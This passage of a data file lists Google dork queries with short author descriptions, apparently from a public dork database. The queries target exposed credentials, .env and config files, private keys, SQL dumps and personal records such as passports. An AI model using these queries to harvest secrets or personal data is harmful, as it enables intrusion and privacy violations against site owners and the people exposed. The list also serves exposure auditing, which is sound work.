*You can find *\"Environment Configuration\"* file *(.env)* Of \"laravel\"* by searching \"*ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=\"\r\n\r\nWhere you can grt \"Credentials of database and SMTP servers\"*\r\n\r\n*Author*: Nirmal Dahal (#Nittam)"}, {"dork": "intext:\"Resource dumped by\" intext:jcr -site:adobe.com", "description": "This request shows a Find useful information about Adobe AEM-CQ\r\nimplementation\r\n\r\nDORK: intext:\"Resource dumped by\" intext:jcr -site:adobe.com\r\n\r\nCheers. Sh3llb0y"}, {"dork": "inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx", "description": "# Google Dork: inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx\r\n# Description: Google Dork to find SharePoint version, FrontPage Configuration Information and SharePoint web services\r\n# Date: 2018-11-07\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "filetype:rdp default.rdp", "description": "Find Remote Desktop Protocol Connection Information\r\n\r\n\r\nfiletype:rdp default.rdp\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:txt \"License Key\"", "description": "Find License Keys for Various Software Products\r\n\r\n\r\nfiletype:txt \"License Key\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intitle:\"index of\" pagefile.sys", "description": "This large (normally over 1GB) file is created by Windows Systems when\r\nthere is not enough RAM in the system. Since lots of the RAM is in the\r\nfile, chances are that a lot of good information will be in it.\r\n\r\nThis is a Windows dork, wont work in Linux or Mac.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n\r\n@brulliant"}, {"dork": "\"site:ghostbin.com \" / \" \"", "description": "Find recently created documents and pastes for GhostBin.com. If nothing\r\ncomes up, click \"*repeat the search with the omitted results included*.\"\r\n\r\n~ CrimsonTorso"}, {"dork": "\"site:hastebin.com \" / \" \"", "description": "Find recently created documents and pastes for Hastebin.com. If nothing\r\ncomes up, click \"*repeat the search with the omitted results included*.\"\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:LOG.txt X-System folder", "description": "inurl:LOG.txt X-System folder\r\n\r\nInformation disclosure - System specs. X-Plane.\r\n\r\n~B15mu7h"}, {"dork": "intext:password \"Login Info\" filetype:txt", "description": "Find Username and Password Combo Login Information\r\n\r\n\r\nintext:password \"Login Info\" filetype:txt\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:txt \"Registration Code\"", "description": "My first dork\r\n\r\nThanks!\r\nT3jv1l"}, {"dork": "filetype:pub \"ssh-rsa\"", "description": "Find SSH Public Keys\r\n\r\n\r\nfiletype:pub \"ssh-rsa\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:doc \"Answer Key\"", "description": "Find Answer Keys\r\n\r\n\r\nfiletype:doc \"Answer Key\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "inurl:apspassword", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP Crystal report access ++\r\n\r\ninurl:apspassword\r\n- open SAP crystal databases to browse\r\n- Possible SQL Injection\r\n- Sensitive information\r\n- Possible Cross-Site Scripting\r\n - https://www.exploit-db.com/exploits/32882\r\n- Possible Directory Traversal\r\n - https://www.exploit-db.com/exploits/16054\r\n- 48 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nCredit goes to the boys of Rapid7"}, {"dork": "intext:\"Portador do CPF\"", "description": "Sensitive personal information.\r\n\r\nAlisson Moretto\r\nundeadsec.com"}, {"dork": "intitle:\"index of\" hosts.csv | firewalls.csv | linux.csv | windows.csv", "description": "Juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" users.csv | credentials.csv | accounts.csv", "description": "Good information, sometimes with passwords.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:scanned & documents intitle:\"index of\" IT", "description": "Juicy info, good for OSINT.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/cgi-bin/WS_FTP.LOG\"", "description": "AUTHOR: FlyingFrog\r\n\r\nTwitter: @ItsKarl0z\r\n\r\n++ Find filed in cgi-bin directories ++\r\n\r\ninurl:\"/cgi-bin/WS_FTP.LOG\""}, {"dork": "intitle:\"index of\" \"hiberfil.sys\"", "description": "This file is a copy of the RAM, it will have the same size of the physical\r\nRAM and it will contain all the data and files of the running system before\r\nit hibernates.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:reports filetype:cache", "description": "intext:reports filetype:cache\r\n\r\nRegards,\r\nHussain vohra"}, {"dork": "inurl:pipermail filetype:txt", "description": "file containing emails..\r\n\r\nRegards\r\nHussain Vohra"}, {"dork": "inurl:/files/_log/ filetype:log", "description": "inurl:/files/_log/ filetype:log"}, {"dork": "inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl", "description": "# Google Dork: inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl\r\n# Description: Web Services Description Language file exposed to internet\r\n# Date: 2019-04-09\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "intext:[To Parent Directory] & ext:sql | ext:cnf | ext:config | ext:log", "description": "# Google Dork: intext:[To Parent Directory] & ext:sql | ext:cnf | ext:config | ext:log\r\n# Description: Google Dork useful to find Directory Listening containing sql,cnf,config and log files\r\n# Date: 2019-09-12\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:\"admin\" | intext:\"root\" | intext:\"administrator\" & intext:\"password\" | intext:\"root\" | intext:\"admin\" | intext:\"administrator\"", "description": "# Google Dork: ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:\"admin\" | intext:\"root\" | intext:\"administrator\" & intext:\"password\" | intext:\"root\" | intext:\"admin\" | intext:\"administrator\"\r\n# Description: Google Dork to find default usernames and passwords\r\n# Date: 2019-09-12\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "\"passport\" filetype:xls site:\"*.edu.*\" | site:\"*.gov.*\" | site:\"*.com.*\" | site:\"*.org.*\" | site:\"*.net.*\" | site:\"*.mil.*\"", "description": "# Exploit Title: [Leaking Passport details]\r\n# Google Dork: [\"passport\" filetype:xls site:\"*.edu.*\" | site:\"*.gov.*\" | site:\"*.com.*\" | site:\"*.org.*\" | site:\"*.net.*\" | site:\"*.mil.*\"]\r\n# Date: [April 29 2019]\r\n# Exploit Author: [Neat - MrMeterpreter]"}, {"dork": "intext:\"@gmail.com\" AND intext:\"@yahoo.com\" filetype:sql", "description": "Exploit : Finds SQL dump files with gmail and yahoo email account.\r\n\r\nGoogle Dork : intext:\"@gmail.com\" AND intext:\"@yahoo.com\" filetype:sql\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intext:\"the WordPress\" inurl:wp-config ext:txt", "description": "*Dork: *\r\nintext:\"the WordPress\" inurl:wp-config ext:txt\r\n\r\n*Description:*\r\nWordPress Configuration files with .txt extension\r\n\r\n*Category:*\r\nFiles Containing Passwords"}, {"dork": "jmeter.log filetype:log", "description": "jmeter.log filetype:log\r\n\r\nTrace jmeter log files\r\n\r\nManhNho"}, {"dork": "\"php class JConfig\" AND inurl:configuration AND ext:\"bak | old | pdf | php | txt\"", "description": "Dork:\r\n\"php class JConfig\" AND inurl:configuration AND ext:\"bak | old | pdf | php | txt\""}, {"dork": "\"keyed alike\" site:gov filetype:pdf", "description": "Description: Find what city governments in the US are using keyed alike\r\npolice cruisers and miscellaneous types of locks.\r\n\r\nAuthor: edm0nd https://twitter.com/edmond_major"}, {"dork": "intext:\"config\" intitle:\"Index of .ssh\"", "description": "Description :\r\nSSH client config files\r\n\r\nDork :\r\nintext:\"config\" intitle:\"Index of .ssh\"\r\n\r\nAuthor :\r\nVipin Joshi(@vocuzi)"}, {"dork": "site:global.gotomeeting.com inurl:recording", "description": "Description: Find recorded meetings of people who used GoToMeeting for a\r\nconference call or meeting. You can also download the full recording.\r\nCategory: Files Containing Juicy Info\r\n\r\nAuthor: edm0nd https://twitter.com/edmond_major"}, {"dork": "inurl:github.com intext:.ftpconfig -issues", "description": "Description :\r\nAnother Atom ftpconfig dork, exposing sftp/ftp creds on Github\r\n\r\nDork :\r\ninurl:github.com intext:.ftpconfig -issues\r\n\r\nAuthor:\r\nVipin Joshi(@vocuzi)"}, {"dork": "filetype:inc php -site:github.com -site:sourceforge.net", "description": "Include files containing source code... and sometimes connection strings...\r\n\r\nGeneral Search:\r\n\r\nfiletype:inc php -site:github.com -site:sourceforge.net\r\n\r\nConnection Strings:\r\n\r\nfiletype:inc php AND mysqli|pdo -site:github.com -site:sourceforge.net"}, {"dork": "s3 site:amazonaws.com filetype:xls login", "description": "Excel files containing sensitive personal information stored on AWS S3\r\nbuckets\r\n\r\n*Google Dork*\r\n\r\ns3 site:amazonaws.com filetype:xls login\r\n\r\n*Dates: 30*-05-2019\r\n\r\n*Dork Author:* acc3ssp0int\r\n\r\n*Tested on:* any OS with a functioning browser running Google.com"}, {"dork": "intext:backup.sql intitle:index.of", "description": "SQL Backups."}, {"dork": "intext:user.sql intitle:index.of", "description": "Also intext:users.sql intitle:index.of"}, {"dork": "\"/FTPSVC2\" intitle:\"index of\"", "description": "Microsoft FTP server logs.\r\nYou can change the file last number to get more results: FTPSVC3, FTPSVC4\r\nand so on... Or (Not recommended) use\r\n\r\n\"/FTPSVC2\" | \"/FTPSVC3\" intitle:\"index of\"\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "intitle:\"index of\" \"W3SVC1\"", "description": "MS IIS log files.\r\n\r\nChange file name or it you want to search for more log\r\nfiles: W3SVC2, W3SVC3 and so on.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "s3 site:amazonaws.com filetype:sql", "description": "SQL Dumps stored on AWS S3 Buckets."}, {"dork": "inurl:old \"index of\" \"wp-config.php\"", "description": "Finds wp-config files on old defunct WordPress installations"}, {"dork": "DB_USERNAME filetype:env", "description": "# Exploit Title: Laravel Environment Configuration\r\n# Google Dork: DB_USERNAME filetype:env\r\n# Author: Francis Al Victoriano"}, {"dork": "site:https://docs.google.com/spreadsheets/d/ password", "description": "- `site:https://docs.google.com/spreadsheets/d/ password` \r\n- `site:https://docs.google.com/spreadsheets/d/ password email` \r\n- `site:https://docs.google.com/spreadsheets/d/ username` \r\n- `site:https://docs.google.com/spreadsheets/d/ ssn` \r\n- `site:https://docs.google.com/spreadsheets/d/ passport number`"}, {"dork": "site:https://docs.google.com/document/d/ password", "description": "- `site:https://docs.google.com/document/d/ password` \r\n- `site:https://docs.google.com/document/d/ password email` \r\n- `site:https://docs.google.com/document/d/ username` \r\n- `site:https://docs.google.com/document/d/ ssn` \r\n- `site:https://docs.google.com/document/d/ passport number`"}, {"dork": "intitle:\"index of\" unattend.xml", "description": "Files containing juicy info and sometimes passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "MAIL_HOST filetype:env", "description": "# Exploit Title: Expose MAIL_HOST with credentials via Laravel Environment\r\n# Google Dork: MAIL_HOST filetype:env\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:\"paypal.log\" ext:log", "description": "# Exploit Title: Expose paypal.log in laravel logs storage\r\n# Google Dork: inurl:\"paypal.log\" ext:log\r\n# Author: Francis Al Victoriano"}, {"dork": "site:https://docs.google.com/forms responses", "description": "site:https://docs.google.com/forms responses \r\n\r\nDescription: \r\n\r\nThis dork allows to view form analytics and responses of generated\r\ngoogle forms"}, {"dork": "site:https://docs.google.com/forms viewanalytics", "description": "site:https://docs.google.com/forms viewanalytics \r\n\r\nDescription: \r\n\r\nThis dork allows you to view form analytics of generated google forms."}, {"dork": "site:https://docs.google.com/spreadsheets responses", "description": "# Exploit Title: Get all responses from Google Spreadsheet\r\n\r\n# Google Dork: site:https://docs.google.com/spreadsheets responses\r\n# Author: Francis Al Victoriano"}, {"dork": "site:https://docs.google.com/spreadsheets edit", "description": "site:https://docs.google.com/spreadsheets edit \r\n\r\nExploit Title: Get all editable spreadsheets of from google spreadsheet \r\n\r\nAuthor: Eliezer Rabadon"}, {"dork": "site:*.com intitle:\"Thank You For Your Order\" intext:Click Here to Download", "description": "# Google Dork : site:*.com intitle:\u201dThank You For Your Order\u201d intext:Click Here to Download\r\n# Author: Ayan Saha\r\n# Date: 21.07.2019\r\n# Tested on : Chrome"}, {"dork": "filetype:xls \"nomina\"", "description": "[*] Dork: filetype:xls \"nomina\"\r\n\r\n[*] Este dork, nos permite buscar archivos con informaci\u00f3n sensible de empresas, como por ejemplo nominas o datos de sus empleados.\r\n\r\n[*] This dork allows us to search for files with sensitive company information, such as payroll or employee data.\r\n\r\nDrok3r"}, {"dork": "inurl:/filedown.php?file=", "description": "# Google Dork: inurl:/filedown.php?file=\r\n# Author: Sayak Naskar\r\n# Date: 29.07.2019"}, {"dork": "intitle:\"Index of\" pass.txt", "description": "dork:\r\nintitle:\"Index of\" pass.txt\r\n\r\nAuthor:Mayur parmar\r\n\r\nInfo:\r\nit contains files that have pass.txt name\r\nsome juicy information"}, {"dork": "s3 site:amazonaws.com filetype:log", "description": "Sensitive Logs stored on AWS S3 bucket\r\n\r\n# Google Dork: s3 site:amazonaws.com filetype:log\r\n# Date: [1-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:robots.txt site:gov + intext:password", "description": "I have discovered a google dork which can be used to find all the URL's\r\nhaving robots.txt in it. As a filter, It will only show those websites\r\nwhich are related to the government and having content related to username\r\nand passwords in those files.\r\n\r\nDORK : inurl:robots.txt site:gov + intext:password"}, {"dork": "ext:sql intext:clave", "description": "# Google Dork: ext:sql intext:clave\r\n# Date: 2019-08-18\r\n\r\n# Author: Cristi Vlad\r\n\r\nThis search often returns accessible Spanish database dumps revealing\r\npotentially sensitive information."}, {"dork": "ext:sql intext:contrasena", "description": "Files Containing Juicy Info\r\nSpanish word for password. Regularly used in coding, projects or templates.\r\n\r\nNicolas Varona Sosa"}, {"dork": "site:*/phpinfo.php intitle:\"phpinfo()\"", "description": "Files containing Juicy info:\r\n\r\nsite:*/phpinfo.php intitle:\"phpinfo()\"\r\ninurl:/info.php intitle:\"phpinfo()\"\r\n\r\nReza ABasi(Turku)"}, {"dork": "site:docs.google.com inurl:forms | viewanalytics intext:see previous responses", "description": "Forms Containing Juicy Info\r\n\r\n# Google Dork: site:docs.google.com inurl:forms | viewanalytics intext:see previous responses\r\n# Date: [21-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:index.of.?.config.ini", "description": "Google Dork: intitle:index.of.?.config.ini\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive configuration file (config.ini) from the website\r\ndirectory, that contains database name, username & password\r\n\r\nAuthor: Midhun Biju"}, {"dork": "ext:sql intext:\"-- phpMyAdmin SQL Dump\" -site:github.*", "description": "Sensitive Directory,Files containing Passwords and Juicy info:\r\n\r\next:sql intext:\"-- phpMyAdmin SQL Dump\" -site:github.*\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/log/access_log", "description": "file containing juicy info:\r\n\r\nsite:*/log/access_log\r\nsite:*/logs/error_log\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"debian.cnf\"", "description": "Files Containing Password:\r\n\r\nintitle:\"index of\" \"debian.cnf\"\r\nintitle:\"index of\" \"db.conf\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/robots.txt intext:User-agent:", "description": "File containing juicy info:\r\n\r\nsite:*/robots.txt intext:User-agent:\r\nsite:*/robots.txt intext:\"# robots.txt\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/phpMyAdmin/robots.txt", "description": "Robots.txt file of site:\r\n\r\nsite:*/phpMyAdmin/robots.txt\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl: /config.txt ext:txt intext:", "description": "Google Dork: inurl: /config.txt ext:txt intext:"}, {"dork": "\"Scanned by Camscanner\" filetype:pdf", "description": "# Google Dork: \"Scanned by Camscanner\" filetype:pdf\r\n# Category: Files Containing Juicy Information\r\n# Author: Surya Teja Masanam\r\n# Date: 10-09-2018"}, {"dork": "site:*/sitemap/sitemap.xml", "description": "file containing juicy info:\r\n\r\nsite:*/sitemap/sitemap.xml\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/application/config/database.php*", "description": "Sensitive Directories and Juice Informations in open public Git/SVN\r\n\r\n@hex0x42424242"}, {"dork": "intitle:\"index of\" \"/mysql.log\"", "description": "files containing juicy info:\r\n\r\nintitle:\"index of\" \"/mysql.log\"\r\nintitle:\"index of\" \"mail.log\"\r\nsite:*/log/error.log\r\nintitle:\"index of\" \"ftp.log\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" inurl:/*sql* filetype:log", "description": "Google Dork: intitle:\"index of\" inurl:/*sql* filetype:log\r\nDate: 09/14/2019\r\nExploit Author: th3d3xt3r\r\nCategory: Files containing Juicy Info"}, {"dork": "intitle:\"index of\" \"debian.conf\"", "description": "*DORK: *intitle:\"index of\" \"ubuntu.conf\"\r\n*Author: Paras Arora(PAC Security)*\r\n*Date: 16 september 2019*\r\n*Category:* Ubuntu Conf files"}, {"dork": "site:ftp.*.* index of: manifest.xml", "description": "*Dork: *site:ftp.*.* index of: manifest.xml\r\n*Author: Deepak Kumar(PAC Security)*\r\n*DATE: 17 Sep 2109*\r\n*CATEGORY: Files containing juicy info*"}, {"dork": "index.of \"crossdomain.xml\"", "description": "Dork:\r\nindex.of \"crossdomain.xml\"\r\n\r\nAuthor:Mayur Parmar(th3cyb3rc0p)"}, {"dork": "site:*/*/conf/httpd.conf", "description": "Files Containing Juicy info:\r\n\r\nsite:*/*/conf/httpd.conf\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:credentials.txt -github -git -gitlab", "description": "This dork can use to find publicly available credentials files in short\r\ncategory of Files Containing Juicy Info.\r\n\r\nDhaiwat Mehta"}, {"dork": "site:*/logs/error.log", "description": "Error Pages:\r\n\r\nsite:*/logs/error.log\r\nsite:*/*/log/error.log\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-settings.php", "description": "Files Containing Juicy info:\r\n\r\nsite:*/wp-settings.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"web.config.txt\"", "description": "Files Containing Juicy info:\r\n\r\nintitle:\"index of\" \"web.config.txt\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/.vscode/sftp.json\"", "description": "inurl:\"/.vscode/sftp.json\"\r\n\r\n-- \r\nMaxime Westhoven"}, {"dork": "inurl:\"/.vscode/ftp-sync.json\"", "description": "inurl:\"/.vscode/ftp-sync.json\"\r\n\r\n-- \r\nMaxime Westhoven"}, {"dork": "intitle:\"Index Of\" intext:sftp-config.json", "description": "intitle:\"Index Of\" intext:sftp-config.json\r\n\r\n-- \r\nMaxime Westhoven"}, {"dork": "site:*.freshservice.com/support/solutions", "description": "# Google Dork that Shows Interesting Information\r\n\r\n# Companies using Freshdesk's Freshservice sometimes accidentally leave their KBs/Solutions public when migrating from another ticketing\r\n\r\n# service. Some do not require login to see internal tech support solutions..\r\n\r\n# add intext:{whatever industry or term} for a more targeted approach.\r\n\r\nsite:*.freshservice.com/support/solutions\r\n\r\nAuthor: MiningOmerta"}, {"dork": "site:mypublicinbox.com intitle:email", "description": "Helps to locate public profiles of MyPublicInbox platform -there is no search form yet-. My Public Inbox is a new way of communication focused on experts of all sectors where they can facilitate their personal contact without exposing it against SPAM, phishing attacks\u2026 and so valuating their time. More info: (https://www.mypublicinbox.com) (https://www.elladodelmal.com/2019/10/mypublicinbox-un-proyecto-para-el-dia.html)\r\n\r\nGerard Fuguet"}, {"dork": "\"accounts.xlsx\" ext:xlsx", "description": "# Google Dork : \"accounts.xlsx\" ext:xlsx\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 03-11-2019\r\n\r\n# Author : Rohitreddy"}, {"dork": "intitle:index.of \"userpass.txt\"", "description": "Dork:\r\nintitle:index.of \"userpass.txt\"\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains key username and password text sensitive information."}, {"dork": "intitle:index.of \"credential.txt\"", "description": "Dork:\r\nintitle:index.of \"credential.txt\"\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains key credential text sensitive information."}, {"dork": "intitle:index.of \"key.txt\"", "description": "Dork:\r\nintitle:index.of \"key.txt\"\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains key clear text sensitive information."}, {"dork": "db_password filetype:env -site:github.com -git", "description": "# Google Dork : db_password filetype:env -site:github.com -git\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 05-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intitle:\"index of\" inurl:ftp intext:logs", "description": "# Google Dork : intitle:\"index of\" inurl:ftp intext:logs\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 05-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intitle:index.of \"private-key.pem\"", "description": "Dork:\r\nintitle:index.of \"private-key.pem\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\n\r\nInfo:\r\nIt contains Private RSA Keys."}, {"dork": "intitle:\"index of\" \"databases.yml\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"databases.yml\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of \"access.conf\"", "description": "Dork:\r\nintitle:index.of \"access.conf\"\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains access.conf clear text sensitive information."}, {"dork": "intitle:\"index of\" \"ssh.yml\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"ssh.yml\"\r\nintitle:\"index of\" \"database-old.yml\"\r\nintitle:\"index of\" \"configuration.yml\"\r\nintitle:\"index of\" \"database.yml\"\r\nintitle:\"index of\" \"ftp.yml\"\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "intitle:\"index of\" \"mail.log\"", "description": "Files containing juciy info:\r\n\r\nintitle:\"index of\" \"mail.log\"\r\nintitle:\"index of\" \"mail.err\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"@gmail.com\" ext:log", "description": "Files containing juicy nfo:\r\n\r\nintext:\"@gmail.com\" ext:log\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"@outlook.com\" ext:log", "description": "Files containing juicy nfo:\r\n\r\nintext:\"@outlook.com\" ext:log\r\nintext:\"@hotmail.com\" ext:log\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "filetype:\"xls | xlsx | doc | docx | ppt | pptx | pdf\" site:gov \"FOUO\" | \"NOFORN\" | \"Confidential\"", "description": "*Google Dork:* filetype:\"xls | xlsx | doc | docx | ppt | pptx | pdf\" site:gov \"FOUO\" | \"NOFORN\" | \"Confidential\"\r\n\r\n*Description: *Files containing confidential information\r\n\r\n*Author: * shivaGprasadh"}, {"dork": "ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e", "description": "Exposed SQL DUMPS\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "Navicat MySQL Data Transfer filetype:sql", "description": "# Google Dork : Navicat MySQL Data Transfer filetype:sql\r\n# Category : Files Containing Juicy Info\r\n# Date : 10-12-2019\r\n# Author : Eka Syahwan"}, {"dork": "inurl:\"web.config\" & intext:\"Data Source\" & \"User ID\" & \"Password\" & \"connectionString\" & ext:config -git", "description": "##Google Dork: inurl:\"web.config\" & intext:\"Data Source\" & \"User ID\" & \"Password\" & \"connectionString\" & ext:config -git\r\n##Description: The above dork will show all the readable web.config files, which includes connection strings of database like server ip, database username, database password etc.\r\n## Submission date: 12/12/2019.\r\n## Author : Aamir Rehman.\r\n## Social : fb.com/yousafzian2"}, {"dork": "[ipn] ext:log", "description": "# Google Dork : [ipn] ext:log\r\n# Category : Sensitive Online Shopping Info\r\n# Date : 10-12-2019\r\n# Author : Eka Syahwan\r\n\r\nThis data contains a log of PayPal payments used by many websites."}, {"dork": "inurl:\"/fmi/webd\" intitle:\"FileMaker WebDirect\"", "description": "# Google Dork : inurl:\"/fmi/webd\" intitle:\"FileMaker WebDirect\"\r\n# Description: Find websites where Filemaker applications are saved. Users\r\ncan run them from the web browser. Some applications do not have user\r\nauthentication, allowing us to find sensitive data depending on the purpose\r\nof the application.\r\n# Category : Files Containing Juicy Info\r\n# Date : 17/12/2019\r\n# Author : Leandro Naranjo\r\n# Social: @tw1_lea"}, {"dork": "\"MailChimp API error:\" ext:log", "description": "# Google Dork: \"MailChimp API error:\" ext:log\r\n# Date: 12.28.2019\r\n# Author: Michael Meade"}, {"dork": "intitle:\"index of\" \"wp-security-audit-log\"", "description": "Files containing juicy info:\r\n\r\nintitle:\"index of\" \"wp-security-audit-log\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"_notes/dwsync.xml\"", "description": "# Google Dork: inurl:_notes/dwsync.xml\"\r\n\r\n# Date: 21-01-2020\r\n# Author: Marcelo Ruz S."}, {"dork": "\"fetchmailrc\" intitle:\"index of\" -linux", "description": "Fetchmail files containing juicy info and sometimes passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" lesshsQ/ OR .lesshst/ -pool -pub", "description": "Less history file which can contain file names good to be used in social\r\nengineering.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" crontab.conf", "description": "Dork leading to a lot of juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" ticket.conf", "description": "Email info sometimes database dumps... Good luck! :)\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" db.key OR server.key OR ftp.key OR exchange.key OR host.key OR mail.key", "description": "This dork will give you a lot of private keys are also known as a secret\r\nkeys.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "krb.conf OR krb.realms intitle:\"index of\" -public -archive -packages -pub", "description": "Kerberos information like usernames and kerbero realms.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "accdb OR accde intitle:\"index of\" -pub -google -books", "description": "Dork gives Microsoft Access databases.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:env intext:APP_NAME", "description": "Google Dork: filetype:env intext:APP_NAME\r\nDescription: Find env file on laravel based website\r\ncontaining database username and password, email username & password\r\nCategory: File containing juicy information"}, {"dork": "intitle:index.of \"keys.txt\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n\r\n++ Find juicy files (API Keys, SSH Keys, Fileserver etc.) ++\r\n\r\nintitle:index.of \"keys.txt\"\r\n\r\nca. 400 Results"}, {"dork": "intitle:\"index.of\" intext:\"access.txt\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n\r\n++ find server logs and possible password/access files ++\r\n\r\nintitle:\"index.of\" intext:\"access.txt\"\r\n\r\nca. 500 Results"}, {"dork": "intitle:\"index.of\" intext:\"api.txt\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n\r\n++ find possible api key files ++\r\n\r\nintitle:\"index.of\" intext:\"api.txt\"\r\n\r\nca. 7300 Results"}, {"dork": "intext:\"SECRET_KEY\" ext|py inurl:mysite -site:stackoverflow.com -site:github.com", "description": "Dork:\r\nintext:\"SECRET_KEY\" ext|py inurl:mysite -site:stackoverflow.com -site:github.com\r\n\r\nDescription:\r\nThis dork queries google and finds the SECRET_KEY within python source code for django, focusing on mysite url.\r\n\r\nCategory:\r\nFiles Containing Juicy Info.\r\n\r\nAuthor:\r\nJadeWolf"}, {"dork": "intitle:index.of \"awsconfig.json\"", "description": "Find some AWS authentication configurations.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"env.bak\"", "description": "Find env backup files.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"smtp.log\"", "description": "*Dork:* intitle:\"index of\" \"smtp.log\"\r\n*Description:*\r\nIt finds SMTP logs\r\n\r\n*Author:* Magrabur Alam Sofily\r\nwww.linkedin.com/in/magrabur-sofily\r\n@masofily"}, {"dork": "intitle: index of \"*db.tar.gz\"", "description": "This dork found some juicy information about the db files.You can change\r\nthe extension another compress application extension.\r\n\r\nGoogle Dork : intitle: index of \"*db.tar.gz\"\r\n\r\nBerat Isler ( root1x )"}, {"dork": "intitle:\"index of/\" \"db.sql\"", "description": "Find database SQL files.\r\n\r\nGoogle Dork: 